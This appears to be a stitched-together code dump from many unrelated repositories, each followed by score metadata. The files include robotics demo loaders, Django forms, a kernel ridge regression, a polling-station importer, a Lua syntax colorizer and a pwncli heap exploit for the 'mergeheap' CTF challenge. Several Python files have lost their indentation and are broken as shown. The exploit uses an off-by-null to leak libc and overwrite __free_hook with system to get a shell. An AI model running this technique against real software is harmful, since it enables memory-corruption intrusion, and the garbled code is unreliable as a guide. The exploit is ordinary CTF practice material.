model = MedicamentoAntecedenteSugerido
fields = ('codigo', 'nombre',)
| 2.078125 | 2 |
1131.py | luizgallas/uri_iniciante | 0 | 12786501 | <reponame>luizgallas/uri_iniciante
fim = 1
vgremio = 0
vinter = 0
empate = 0
final = 0
soma = 0
while (fim == 1):
inter, gremio = map(int, input().split())
soma += 1
if inter > gremio:
vinter = vinter + 1
elif gremio > inter:
vgremio = vgremio + 1
elif inter == gremio:
empate += 1
print("Novo grenal (1-sim 2-nao)")
fim = int(input())
print(soma,"grenais")
print("Inter:%d" %(vinter))
print("Gremio:%d" %(vgremio))
print("Empates:%d" %(empate))
if vinter > vgremio:
print("Inter venceu mais")
elif vgremio > vinter:
print("Gremio venceu mais")
else:
print("Nao houve vencedor")
| 3.4375 | 3 |
examples/offline/bc_robo_utils.py | mohanksriram/robolfd | 0 | 12786502 | from dataclasses import dataclass
import h5pickle as h5py
import json
import numpy as np
from numpy import ndarray
from pathlib import Path
from typing import List
import random
from robolfd.types import Transition
import robosuite
from robosuite.utils.mjcf_utils import postprocess_model_xml
import itertools
from tqdm import tqdm
from multiprocessing import Pool
@dataclass
class DemoConfig:
obs_keys: dict
max_episodes: int
num_workers: int
def __str__(self) -> str:
return f"demo config - observation keys: {self.obs_keys} max_episodes: {self.max_episodes}, num_workers: {self.num_workers}"
def generate_episode_transitions(demo_info):
f, episode_num, config = demo_info
episodes = list(f["data"].keys())
episode = episodes[episode_num]
env_info = json.loads(f["data"].attrs["env_info"])
env = robosuite.make(
**env_info,
has_renderer=False,
has_offscreen_renderer=False,
ignore_done=True,
use_camera_obs=False,
reward_shaping=True,
control_freq=20,
)
model_xml = f[f"data/{episode}"].attrs["model_file"]
env.reset()
xml = postprocess_model_xml(model_xml)
env.reset_from_xml_string(xml)
env.sim.reset()
all_observations = []
all_actions = []
# TODO: start from state
states = f[f"data/{episode}/states"][()]
actions = np.array(f[f"data/{episode}/actions"][()])
# load the initial state
env.sim.set_state_from_flattened(states[0])
env.sim.forward()
observations = []
action = [0, 0, 0, -1]
observation, _, _, _ = env.step(action)
# observe the current state
observations.append(observation)
used_actions = []
# Fix the order of action, observation sampling problem here
for j, action in enumerate(actions):
action = np.clip(action, -1, 1)
observation, reward, done, misc = env.step(action)
# use when you want to evaluate the environment
# env.render()
used_actions.append(action)
observations.append(observation)
# repeat last action for last observation
used_actions.append(actions[-1])
flat_observations = []
for observation in observations:
flat_observations.append(np.concatenate([observation[key] for key in config.obs_keys]))
all_observations.extend(flat_observations)
all_actions.extend(used_actions)
return list(zip(all_observations, all_actions))
def make_demonstrations(demo_path: Path, config: DemoConfig) -> ndarray:
f = h5py.File(demo_path, "r", skip_cache=False)
episodes = list(f["data"].keys())[-config.max_episodes:]
# TODO: Decide how to batch transitions across episodes
# Dataset is collected in the form of transitions.
pbar = tqdm(total=len(episodes))
with Pool(config.num_workers) as pool:
# simple pool usage
# transitions = pool.map(generate_episode_transitions, [(demo_path, i, config) for i in range(len(episodes))])
# for measuring progress:
res = [pool.apply_async(generate_episode_transitions, args=((f, i, config),),
callback=lambda _: pbar.update(1)) for i in range(len(episodes))]
transitions = [p.get() for p in res]
pool.close()
pool.join()
return transitions
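
# --- illustrative usage sketch (path and observation keys are assumptions) -----
if __name__ == '__main__':
    demo_file = Path('demos/lift/demo.hdf5')  # hypothetical demo file
    config = DemoConfig(
        obs_keys=['robot0_proprio-state', 'object-state'],  # assumed observation keys
        max_episodes=10,
        num_workers=4,
    )
    episode_transitions = make_demonstrations(demo_file, config)
    # an evaluation environment can then be built with make_eval_env(demo_file)
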
def make_eval_env(demo_path: Path, robot_name="Panda", has_offscreen_renderer = True):
f = h5py.File(demo_path, "r")
env_name = f["data"].attrs["env"]
env_info = json.loads(f["data"].attrs["env_info"])
env_info['robots'] = robot_name
env = robosuite.make(
**env_info,
has_renderer=not has_offscreen_renderer,
has_offscreen_renderer=has_offscreen_renderer,
ignore_done=True,
use_camera_obs=has_offscreen_renderer,
reward_shaping=True,
control_freq=20,
camera_names="frontview",
camera_heights=512,
camera_widths=512,
)
return env | 2.109375 | 2 |
test/mock_tests/test_markets.py | xelonic-de/iex-data | 2 | 12786503 | <reponame>xelonic-de/iex-data<gh_stars>1-10
from unittest import TestCase
from mock import patch, MagicMock
import iexdata.endpoints.markets as markets
class TestAll(TestCase):
def test_markets(self):
with patch('requests.get') as mock:
mock.return_value = MagicMock()
mock.return_value.status_code = 200
markets.market()
| 2.203125 | 2 |
scorecardpy/describe.py | cuichaosiig/scorecard_improved | 0 | 12786504 | <filename>scorecardpy/describe.py
import pandas as pd
import numpy as np
def unique_counts(df, cols):
    '''
    Show the number of unique values in each column.
    df: dataframe to process
    cols: columns to process
    return:
        per-column unique-value counts
    -------------------------------
    Author: 崔超
    '''
    uniqC = df[cols].apply(lambda x: len(x.value_counts()), axis=0)
    return uniqC
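
# --- illustrative usage sketch (column names are assumptions) -----------------
if __name__ == '__main__':
    demo = pd.DataFrame({'grade': ['A', 'B', 'A', 'C'], 'flag': [0, 1, 0, 0]})
    print(unique_counts(demo, ['grade', 'flag']))  # grade -> 3, flag -> 2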
| 3.03125 | 3 |
archive/KyleChesney/combine_repeat_ihar.py | ChemiKyle/USING-MACHINE-LEARNING-TO-IMPROVE-POST-ACUTE-REHABILITATION-PROCESS-FLOW | 0 | 12786505 | <filename>archive/KyleChesney/combine_repeat_ihar.py
# We noticed that what should be a unique visit identifier, IHAR, was repeating
# the cause was that patients transferred out or taking leave were listed as being discharged and readmitted
# but they were not assigned a new visit identifier.
# Our solution to clean this was to identify duplicate IHARs, and condense them into one visit
# by using only the earliest admission and latest discharge, all other columns for these entries were identical.
# Akshay solved this problem via other methods directly in Pandas,
# this code is left here for essentially sentimental reasons
from datetime import datetime as dt

import numpy as np
import pandas as pd
df_qual = pd.read_csv('data/FinalData.csv')
repeat_ihars = df_qual[df_qual['IHAR'].duplicated()]['IHAR'].unique()
df_qual['date_delta'] = df_qual['HOSP_DISCH_TIME'] - df_qual['HOSP_ADMSN_TIME']
# IHAR: {min: xx, max: yy}
ihar_intermediary = {}
time_format = '%d-%b-%Y %H:%M:%S'
for index, row in df_qual.iterrows():
ihar = (row['IHAR'])
if (ihar in repeat_ihars):
this_adm = row['HOSP_ADMSN_TIME']
print(this_adm)
this_dsch = row['HOSP_DISCH_TIME']
if (ihar not in ihar_intermediary):
if (np.isnan(this_adm) | np.isnan(this_dsch)):
continue
else:
ihar_intermediary[ihar] = {'min_adm': this_adm, 'max_disch': this_dsch}
else:
if (np.isnan(this_adm) | np.isnan(this_dsch)):
continue
            print(this_adm)
this_adm_dt = dt.strptime(this_adm, time_format)
this_dsch_dt = dt.strptime(this_dsch, time_format)
| 2.484375 | 2 |
ASTParser/parser_main.py | DploY707/AST_parser | 4 | 12786506 | from pprint import pprint
import json
import gzip
import pickle
import copy
from androguard.decompiler.dad.decompile import DvMethod
from androguard.misc import AnalyzeAPK
from core.parser import ASTParser
from core.parser import ConstData
from core.parser import stmtList
from core.parser import actionList
from core.parser import dataList
from core.statements import Statement
from core.graph import ASTGraph
from core.graph import GraphConfig
from core.utils import save_pickle, load_pickle
from core.utils import get_filteredFileList_from_directory as get_targets
import networkx as nx
targetPath = 'data/'
target = 'data/okhttp-3.1.0_dex.jar'
resultPath = '/root/result/'
targetExts = ['.apk', '.jar']
# config = GraphConfig(10000,20000)
def create_ast(method):
if method.is_external():
return
try:
dv = DvMethod(method)
dv.process(doAST=True)
return dv.get_ast()
except AttributeError as ae:
        print('ERROR : in create_ast()')
if __name__ == '__main__' :
targetList = get_targets(targetPath, targetExts)
for target in targetList:
a, d, dx = AnalyzeAPK(target)
t_count = 0
graphList = list()
for method in dx.get_methods():
m_ast = create_ast(method)
ap = ASTParser()
if m_ast is not None:
ap.load_ast(m_ast)
ap.parse_ast()
# for node in ap.parsedNodes:
# if 'APIName' == node.nodeInfo.type:
# pprint(node.nodeInfo)
# for edge in ap.parsedEdges:
# pprint(edge)
# ag = ASTGraph(ap.parsedNodes, ap.parsedEdges, config)
ag = ASTGraph(ap.parsedNodes, ap.parsedEdges)
ag.graph_initialize()
# encode_flag makes the index of edges meaningful
# ag.graph_initialize(encode_flag = True)
if ag.graph == None:
pass
else:
graphList.append(ag.graph)
save_pickle(resultPath + target.split('/')[1] + '.pickle', graphList)
| 2.0625 | 2 |
apps/oob/forms/task_forms.py | dbjennings/order-of-business | 0 | 12786507 | from django.forms import ModelForm, Form, CharField
from ..models import Project, Task
class TaskSearchForm(Form):
'''Form for the task search bar'''
query = CharField(max_length=100)
query.widget.attrs.update({'placeholder': 'Search all tasks...',
'class': 'form-control',})
class TaskForm(ModelForm):
class Meta:
model = Task
fields = ('title','body','project',)
def __init__(self, *args, **kwargs):
'''Uses the passed request to populate fields'''
if kwargs['request']:
self.request = kwargs.pop('request')
super(TaskForm,self).__init__(*args, **kwargs)
self.fields['project'].queryset = Project.objects.filter(user=self.request.user)
else:
super(TaskForm,self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Title',
'id': 'taskTitle',})
self.fields['body'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Body',
'id': 'taskBody',
'style': 'height: 8rem;',})
self.fields['project'].widget.attrs.update({'class': 'form-select border border-dark',
'placeholder': 'Project',
'id': 'taskProject',})
| 2.03125 | 2 |
tests/object/object.py | dem4ply/chibi | 0 | 12786508 | from unittest import TestCase
from chibi.object import Chibi_object
from chibi.object.descriptor import (
String, Dict, Tree_simple, Dict_defaults, Set
)
class Chibi_object_empty( Chibi_object ):
pass
class Chibi_object_with_descriptors( Chibi_object ):
name = String()
test_dict = Dict()
test_dict_default = Dict_defaults()
test_tree = Tree_simple()
test_set = Set()
class Chibi_object_with_defaults( Chibi_object ):
name = String( default='hello' )
test_dict_default = Dict_defaults( default='word' )
class Test_chibi_object( TestCase ):
def test_chibi_object_simple( self ):
obj = Chibi_object_empty()
self.assertIsInstance( obj, Chibi_object )
def test_with_descriptors( self ):
obj = Chibi_object_with_descriptors()
self.assertIsInstance( obj, Chibi_object )
self.assertEqual( obj.name, '' )
obj.name = 'hellooo'
self.assertEqual( obj.name, 'hellooo' )
self.assertIsNone( obj.test_dict )
obj.test_dict = { 'key': 'test' }
self.assertEqual( obj.test_dict, { 'key': 'test' } )
self.assertFalse( obj.test_dict_default )
data = obj.test_dict_default[ 'sadf' ]
self.assertIsNone( data )
self.assertFalse( obj.test_tree )
self.assertEqual( list( obj.test_tree.keys() ), [] )
self.assertEqual( len( obj.test_set ), 0 )
def test_with_descriptior_assing( self ):
obj = Chibi_object_with_descriptors( name='stuff', test_dict={} )
self.assertEqual( obj.test_dict, {} )
self.assertEqual( obj.name, 'stuff' )
obj.name = 'asdf'
self.assertEqual( obj.name, 'asdf' )
obj.test_dict['asdf'] = 123
self.assertEqual( obj.test_dict, { 'asdf': 123 } )
self.assertFalse( obj.test_tree )
obj.test_tree.a.b.c
self.assertEqual( obj.test_tree, { 'a': { 'b': { 'c': {} } } } )
obj.test_tree.a.rusky = 'RUSH B'
self.assertEqual( obj.test_tree, { 'a': { 'rusky': 'RUSH B',
'b': { 'c': {} } } } )
obj.test_dict_default[ 'qwer' ] = 'word'
self.assertIsNotNone( obj.test_dict_default[ 'qwer' ] )
self.assertEqual( obj.test_dict_default[ 'qwer' ], 'word' )
obj.test_set |= set( 'abc' )
self.assertEqual( len( obj.test_set ), 3 )
def test_with_defaults( self ):
obj = Chibi_object_with_defaults()
self.assertEqual( obj.name, 'hello' )
obj.name = 'zxcv'
self.assertEqual( obj.name, 'zxcv' )
word = obj.test_dict_default[ 'hello' ]
self.assertEqual( word, 'word' )
| 3.21875 | 3 |
txrest/__init__.py | dr4ke616/txREST | 0 | 12786509 | # -*- test-case-name: <INSERT_TEST_MODULE> -*-
# Copyright (c) 2014 <NAME> <<EMAIL>>
# See LICENSE for more details
"""
.. module:: controller
:platform: Linux
:synopsis: Just the __init__.py file
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from txrest.managers.routing import RouteManager
route = RouteManager().route
| 1.617188 | 2 |
test/nose_test.py | fakeNetflix/uber-repo-doubles | 150 | 12786510 | <gh_stars>100-1000
import unittest
from nose.plugins import PluginTester
from doubles.nose import NoseIntegration
from doubles.instance_double import InstanceDouble
from doubles.targets.expectation_target import expect
def test_nose_plugin():
class TestNosePlugin(PluginTester, unittest.TestCase):
activate = '--with-doubles'
plugins = [NoseIntegration()]
def test_expect(self):
assert 'MockExpectationError' in self.output
assert 'FAILED (failures=1)' in self.output
assert 'Ran 2 tests' in self.output
def makeSuite(self):
class TestCase(unittest.TestCase):
def runTest(self):
subject = InstanceDouble('doubles.testing.User')
expect(subject).instance_method
def test2(self):
pass
return [TestCase('runTest'), TestCase('test2')]
result = unittest.TestResult()
TestNosePlugin('test_expect')(result)
assert result.wasSuccessful()
| 2.421875 | 2 |
ingest/datasets/cifar-10/DataReader.py | ivmfnal/striped | 1 | 12786511 | <gh_stars>1-10
import numpy as np
from BaseDataReader import BaseDataReader
from keras.datasets import cifar10
from keras.utils import to_categorical
class DataReader(BaseDataReader):
def __init__(self, file_path, schema):
(x_train, y_train), _ = cifar10.load_data()
self.x_train = np.asarray(x_train, dtype=np.float32)/256.
self.y_train = to_categorical(y_train, 10)
self.Schema = schema
def profile(self):
return None
def reopen(self):
pass
def nevents(self):
return len(self.x_train)
def branchSizeArray(self, bname):
pass
def stripesAndSizes(self, groups, bname, attr_name, attr_desc):
src = attr_desc["source"]
src_array = {'x': self.x_train, 'y': self.y_train }[src]
i = 0
for g in groups:
yield np.ascontiguousarray(src_array[i:i+g]), None
i += g
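# Illustrative sketch (added for clarity, not part of the original ingest code):
# stripesAndSizes walks the chosen source array in consecutive chunks, so with
# groups = [2, 3] it yields one stripe of 2 rows followed by one stripe of 3 rows.
#
#     reader = DataReader("unused_path", schema=None)   # file_path is ignored; downloads CIFAR-10
#     stripes = list(reader.stripesAndSizes([2, 3], "b", "x", {"source": "x"}))
#     assert stripes[0][0].shape[0] == 2 and stripes[1][0].shape[0] == 3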
| 2.8125 | 3 |
REGRESSION/Ridge Regression/KERNEL RIDGE/kernelridge.py | algostatml/SUPERVISED-ML | 0 | 12786512 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 11 18:55:01 2019
@author: kenneth
"""
from __future__ import absolute_import
import numpy as np
from Utils.utils import EvalR
from Utils.Loss import loss
from Utils.kernels import Kernels
class kernelridge(EvalR, loss, Kernels):
def __init__(self, kernel = None, lamda = None):
super().__init__()
if not kernel:
kernel = 'linear'
self.kernel = kernel
else:
self.kernel = kernel
if not lamda:
lamda = 100000
self.lamda = lamda
else:
self.lamda = lamda
return
def kernelize(self, x1, x2):
'''
:params: x1: NxD
:params: x2: NxD
'''
if self.kernel == 'linear':
return Kernels.linear(x1, x2)
elif self.kernel == 'rbf':
return Kernels.rbf(x1, x2)
elif self.kernel == 'sigmoid':
return Kernels.sigmoid(x1, x2)
elif self.kernel == 'polynomial':
return Kernels.polynomial(x1, x2)
elif self.kernel == 'cosine':
return Kernels.cosine(x1, x2)
elif self.kernel == 'correlation':
return Kernels.correlation(x1, x2)
def fit(self, X, y):
'''
:param: X: NxD
        :param: y: Nx1
'''
self.X = X
self.y = y
self.alpha = np.linalg.solve(self.kernelize(self.X, self.X) + self.lamda*np.eye(self.X.shape[0]), self.y)
return self
def predict(self, X):
'''
:param: X: NxD
        :return type: Nx1 vector of predictions, one per row of X
'''
return np.dot((self.kernelize(self.X, X).T * self.y), self.alpha.T)
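# Background note (added for clarity, not in the original file): standard kernel
# ridge regression solves the dual problem in closed form,
#     alpha = (K(X, X) + lamda * I)^(-1) y,    y_hat = K(X_new, X_train) @ alpha
# which is what fit() computes via np.linalg.solve; predict() above additionally
# rescales the kernel columns by the training targets y before applying alpha.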
#%% Testing
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import Normalizer, StandardScaler
X, y = load_boston().data, load_boston().target
X = StandardScaler().fit_transform(X)
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size = .3)
kridge = kernelridge().fit(X_train, Y_train)
kridge.predict(X_test)
kridge.summary(X, Y_test, kridge.predict(X_test))
#%%
from sklearn.kernel_ridge import KernelRidge
clf = KernelRidge(alpha=1.0, kernel='linear')
clf.fit(X, y)
kridge.summary(X, Y_test, clf.predict(X_test))
| 2.578125 | 3 |
teamleader/__init__.py | rubenvdb/python-teamleader | 0 | 12786513 | <filename>teamleader/__init__.py
__prog__ = 'python-teamleader'
__version__ = u'1.2.1'
| 1.210938 | 1 |
polling_stations/apps/data_importers/management/commands/import_southwark.py | smsmith97/UK-Polling-Stations | 29 | 12786514 | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "SWK"
addresses_name = "2021-04-13T12:22:55.056323/southwark_deduped.tsv"
stations_name = "2021-04-13T12:22:55.056323/southwark_deduped.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
csv_encoding = "windows-1252"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"200003422738", # FLAT 2, 29 RODNEY PLACE, LONDON
"200003422744", # FLAT 8, 29 RODNEY PLACE, LONDON
"200003422746", # FLAT 10, 29 RODNEY PLACE, LONDON
"200003422739", # FLAT 3, 29 RODNEY PLACE, LONDON
"200003422737", # FLAT 1, 29 RODNEY PLACE, LONDON
"200003422745", # FLAT 9, 29 RODNEY PLACE, LONDON
"200003422743", # FLAT 7, 29 RODNEY PLACE, LONDON
"200003422740", # FLAT 4, 29 RODNEY PLACE, LONDON
"200003422741", # FLAT 5, 29 RODNEY PLACE, LONDON
"200003422742", # FLAT 6, 29 RODNEY PLACE, LONDON
"200003380843", # SHEET METAL MUSIC LTD, 212 ILDERTON ROAD, LONDON
"10094086807", # APARTMENT 1, 346 ROTHERHITHE STREET, LONDON
"10093338854", # 73C 73 CAMBERWELL GROVE, LONDON
"10093338853", # 73B 73 CAMBERWELL GROVE, LONDON
"200003394858", # 17 LYNDHURST WAY, LONDON
"10094743403", # 88 HALF MOON LANE, LONDON
"10094743404", # 90 HALF MOON LANE, LONDON
"10094743401", # 84 HALF MOON LANE, LONDON
"10094743402", # 86 HALF MOON LANE, LONDON
"10090283768", # KILIMANJARO LIVE LTD, SECOND FLOOR NORTH 15 BERMONDSEY SQUARE, LONDON
"200003492155", # BELLENDEN PRIMARY SCHOOL BELLENDEN ROAD, LONDON
"10093341594", # FLAT 6 4 JAMAICA ROAD, LONDON
"10093341595", # FLAT 7 4 JAMAICA ROAD, LONDON
"10093339544", # LONDON HOUSING FOUNDATION LTD, GROUND FLOOR REAR TEMPUS WHARF 29 BERMONDSEY WALL WEST, LONDON
"200003468937", # GROUNDSMANS COTTAGE COLLEGE ROAD, LONDON
"10094086939", # FLAT 4B 98 EAST DULWICH ROAD, LONDON
"10091665680", # 23 CAMBERWELL GROVE, LONDON
"200003465665", # 120 WARNER ROAD, LONDON
"10093340214", # SPORTS DIRECT, 91 RYE LANE, LONDON
"10091665874", # FLAT A 156 LOWER ROAD, LONDON
]:
return None
if record.addressline6 in [
"SE5 0SY",
"SE15 5AD",
"SE1 2PS",
"SE5 7HY",
"SE15 6BJ",
"SE1 3UL",
"SE16 2QU",
"SE16 6AZ",
"SE1 2AD",
"SE15 2FF",
"SE1 0AA",
"SE1 0NS",
"SE15 3DN",
"SE5 0HB",
"SE15 2ND",
]:
return None
if record.addressline1 == "Excluding Third Floor and Fourth Floor":
return None
return super().address_record_to_dict(record)
| 2.09375 | 2 |
thortils/interactions.py | zkytony/thortils | 0 | 12786515 | def OpenObject(controller, objectId, openness=1.0):
return controller.step(action="OpenObject",
objectId=objectId,
openness=openness)
def CloseObject(controller, objectId):
return controller.step(action="CloseObject",
objectId=objectId)
def PickupObject(controller, objectId):
return controller.step(action="PickupObject",
objectId=objectId)
def DropObject(controller, objectId):
# Note: In version 3.3.4, this action takes no objectId argument.
return controller.step(action="DropHandObject")
def ToggleObjectOn(controller, objectId):
return controller.step(action="ToggleObjectOn",
objectId=objectId)
def ToggleObjectOff(controller, objectId):
return controller.step(action="ToggleObjectOff",
objectId=objectId)
def PushObjectLeft(controller, objectId, pushAngle="270", moveMagnitude="100"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PushObjectRight(controller, objectId, moveMagnitude="100", pushAngle="90"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PushObjectForward(controller, objectId, moveMagnitude="0", pushAngle="270"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PullObject(controller, objectId, moveMagnitude="100", pushAngle="180"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def RemoveFromScene(controller, objectId):
return controller.step(action="RemoveFromScene",
objectId=objectId)
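# Illustrative usage sketch (added for clarity; the scene and object lookup below
# are hypothetical): each helper is a thin wrapper around ai2thor's Controller.step,
# so a typical call site looks like
#
#     from ai2thor.controller import Controller
#     controller = Controller(scene="FloorPlan1")
#     objs = controller.last_event.metadata["objects"]
#     fridge_id = next(o["objectId"] for o in objs if o["objectType"] == "Fridge")
#     OpenObject(controller, fridge_id, openness=0.5)
#     CloseObject(controller, fridge_id)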
| 2.359375 | 2 |
buuctf/136-hwb_2019_mergeheap/exp.py | RoderickChan/ctf_tasks | 0 | 12786516 | #!/usr/bin/python3
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def add(length:int, data="a\n"):
assert length <= 0x400
p.sendlineafter(">>", "1")
p.sendlineafter("len:", str(length))
p.sendafter("content:", data)
def show(idx):
p.sendlineafter(">>", "2")
p.sendlineafter("idx:", str(idx))
m = p.recvline()
info(f"Get msg: {m}")
return m
def dele(idx):
p.sendlineafter(">>", "3")
p.sendlineafter("idx:", str(idx))
def merge(id1, id2):
p.sendlineafter(">>", "4")
p.sendlineafter("idx1:", str(id1))
p.sendlineafter("idx2:", str(id2))
def bye():
p.sendlineafter(">>", "5")
"""
1. off by null
"""
add(0x400) # 0
add(0xf0, 0xf0*"a") # 1
add(0x8, 0x8*"a") # 2
merge(0, 1) # 3 # 0x500
add(0xf8) # 4
merge(0, 1) # 5 0x500
add(0x10) # 6 gap
# free to get unsortedbin chunk
dele(3)
dele(4)
# off by null
merge(1, 2) # 3
dele(3)
add(0xf8, b"a"*0xf0+p64(0x600)) # 3
dele(5)
add(0x3f0) # 4
add(0xf0) # 5
m = show(3)
libc_abse_addr = u64_ex(m[:-1]) - 0x3ebca0
log_libc_base_addr(libc_abse_addr)
libc.address = libc_abse_addr
add(0xf0) # 7 overlapped with 3
dele(3)
dele(7)
add(0xf0, p64(libc.sym['__free_hook'])+b"\n") # 3
add(0xf0, "/bin/sh\x00\n") # 7
add(0xf0, p64(libc.sym['system'])+b"\n")
dele(7)
get_flag_when_get_shell(p)
p.interactive() | 2.125 | 2 |
src/urllib3/_compat.py | Stanislav1975/urllib3 | 2 | 12786517 | class RLock: # Python 3.6
# We shim out a context manager to be used as a compatibility layer
# if the system `threading` module doesn't have a real `RLock` available.
def __enter__(self) -> None:
pass
def __exit__(self, exc_type: object, exc_value: object, traceback: object) -> None:
pass
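# Illustrative fallback pattern (added for clarity, not part of the original file):
# callers are expected to try the real lock first and fall back to this no-op shim.
#
#     try:
#         from threading import RLock
#     except ImportError:
#         from ._compat import RLock
#
#     with RLock():
#         ...  # critical section (a no-op when the shim above is used)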
| 2.53125 | 3 |
leo/modes/lua.py | frakel/leo-editor | 0 | 12786518 | <gh_stars>0
# Leo colorizer control file for lua mode.
# This file is in the public domain.
# Properties for lua mode.
properties = {
"commentEnd": "]]",
"commentStart": "--[[",
"doubleBracketIndent": "true",
"indentCloseBrackets": "}",
"indentOpenBrackets": "{",
"lineComment": "--",
"lineUpClosingBracket": "true",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for lua_main ruleset.
lua_main_attributes_dict = {
"default": "null",
"digit_re": "[[:digit:]]*(\\.[[:digit:]]*)?([eE][+-]?[[:digit:]]*)?",
"escape": "",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "_:.",
}
# Dictionary of attributes dictionaries for lua mode.
attributesDictDict = {
"lua_main": lua_main_attributes_dict,
}
# Keywords dict for lua_main ruleset.
lua_main_keywords_dict = {
"...": "keyword2",
"LUA_PATH": "keyword2",
"_ALERT": "keyword2",
"_ERRORMESSAGE": "keyword2",
"_G": "keyword2",
"_LOADED": "keyword2",
"_PROMPT": "keyword2",
"_REQUIREDNAME": "keyword2",
"_VERSION": "keyword2",
"__add": "keyword2",
"__call": "keyword2",
"__concat": "keyword2",
"__div": "keyword2",
"__eq": "keyword2",
"__fenv": "keyword2",
"__index": "keyword2",
"__le": "keyword2",
"__lt": "keyword2",
"__metatable": "keyword2",
"__mode": "keyword2",
"__mul": "keyword2",
"__newindex": "keyword2",
"__pow": "keyword2",
"__sub": "keyword2",
"__tostring": "keyword2",
"__unm": "keyword2",
"and": "keyword1",
"arg": "keyword2",
"assert": "keyword2",
"break": "keyword1",
"collectgarbage": "keyword2",
"coroutine.create": "keyword2",
"coroutine.resume": "keyword2",
"coroutine.status": "keyword2",
"coroutine.wrap": "keyword2",
"coroutine.yield": "keyword2",
"debug.debug": "keyword2",
"debug.gethook": "keyword2",
"debug.getinfo": "keyword2",
"debug.getlocal": "keyword2",
"debug.getupvalue": "keyword2",
"debug.sethook": "keyword2",
"debug.setlocal": "keyword2",
"debug.setupvalue": "keyword2",
"debug.traceback": "keyword2",
"do": "keyword1",
"dofile": "keyword2",
"else": "keyword1",
"elseif": "keyword1",
"end": "keyword1",
"error": "keyword2",
"false": "keyword3",
"for": "keyword1",
"function": "keyword1",
"gcinfo": "keyword2",
"getfenv": "keyword2",
"getmetatable": "keyword2",
"if": "keyword1",
"in": "keyword1",
"io.close": "keyword2",
"io.flush": "keyword2",
"io.input": "keyword2",
"io.lines": "keyword2",
"io.open": "keyword2",
"io.read": "keyword2",
"io.stderr": "keyword2",
"io.stdin": "keyword2",
"io.stdout": "keyword2",
"io.tmpfile": "keyword2",
"io.type": "keyword2",
"io.write": "keyword2",
"ipairs": "keyword2",
"loadfile": "keyword2",
"loadlib": "keyword2",
"loadstring": "keyword2",
"local": "keyword1",
"math.abs": "keyword2",
"math.acos": "keyword2",
"math.asin": "keyword2",
"math.atan": "keyword2",
"math.atan2": "keyword2",
"math.ceil": "keyword2",
"math.cos": "keyword2",
"math.deg": "keyword2",
"math.exp": "keyword2",
"math.floor": "keyword2",
"math.frexp": "keyword2",
"math.ldexp": "keyword2",
"math.log": "keyword2",
"math.log10": "keyword2",
"math.max": "keyword2",
"math.min": "keyword2",
"math.mod": "keyword2",
"math.pi": "keyword2",
"math.pow": "keyword2",
"math.rad": "keyword2",
"math.random": "keyword2",
"math.randomseed": "keyword2",
"math.sin": "keyword2",
"math.sqrt": "keyword2",
"math.tan": "keyword2",
"next": "keyword2",
"nil": "keyword3",
"not": "keyword1",
"or": "keyword1",
"os.clock": "keyword2",
"os.date": "keyword2",
"os.difftime": "keyword2",
"os.execute": "keyword2",
"os.exit": "keyword2",
"os.getenv": "keyword2",
"os.remove": "keyword2",
"os.rename": "keyword2",
"os.setlocale": "keyword2",
"os.time": "keyword2",
"os.tmpname": "keyword2",
"pairs": "keyword2",
"pcall": "keyword2",
"print": "keyword2",
"rawequal": "keyword2",
"rawget": "keyword2",
"rawset": "keyword2",
"repeat": "keyword1",
"require": "keyword2",
"return": "keyword1",
"setfenv": "keyword2",
"setmetatable": "keyword2",
"string.byte": "keyword2",
"string.char": "keyword2",
"string.dump": "keyword2",
"string.find": "keyword2",
"string.format": "keyword2",
"string.gfind": "keyword2",
"string.gsub": "keyword2",
"string.len": "keyword2",
"string.lower": "keyword2",
"string.rep": "keyword2",
"string.sub": "keyword2",
"string.upper": "keyword2",
"table.concat": "keyword2",
"table.foreach": "keyword2",
"table.foreachi": "keyword2",
"table.getn": "keyword2",
"table.insert": "keyword2",
"table.remove": "keyword2",
"table.setn": "keyword2",
"table.sort": "keyword2",
"then": "keyword1",
"tonumber": "keyword2",
"tostring": "keyword2",
"true": "keyword3",
"type": "keyword2",
"unpack": "keyword2",
"until": "keyword1",
"while": "keyword1",
"xpcall": "keyword2",
}
# Dictionary of keywords dictionaries for lua mode.
keywordsDictDict = {
"lua_main": lua_main_keywords_dict,
}
# Rules for lua_main ruleset.
def lua_rule0(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="--[[", end="]]",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule1(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="--",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def lua_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="#!",
at_line_start=True, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def lua_rule3(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
